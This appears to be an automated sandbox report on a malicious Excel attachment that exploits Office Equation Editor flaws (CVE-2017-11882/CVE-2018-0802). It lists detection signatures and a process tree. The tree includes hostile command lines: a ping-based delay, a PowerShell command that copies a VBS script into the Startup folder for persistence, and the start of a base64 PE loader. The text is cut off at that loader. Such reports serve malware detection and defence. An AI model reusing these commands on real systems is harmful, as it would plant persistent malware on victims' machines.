Windows Analysis Report: RFQ PO9845.xlsx
Overview
General Information
Detection
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Wscript starts Powershell (via cmd or directly)
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Very long command line found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Shellcode detected
Uses ping.exe to sleep
Office equation editor establishes network connection
Queries the volume information (name, serial number, etc.) of a device
Yara signature match
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Classification
- System is w7x64
- EXCEL.EXE (PID: 2640 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
- EQNEDT32.EXE (PID: 204 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
- wscript.exe (PID: 3100 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\jyrthfdwrg.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
- cmd.exe (PID: 3156 cmdline: "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs') MD5: AD7B9C14083B52BC532FBA5948342B98)
- PING.EXE (PID: 3180 cmdline: ping 127.0.0.1 -n 10 MD5: 6242E3D67787CCBF4E06AD2982853144)
- powershell.exe (PID: 3320 cmdline: powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs') MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
- powershell.exe (PID: 3380 cmdline:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('[base64-encoded PE payload omitted] ...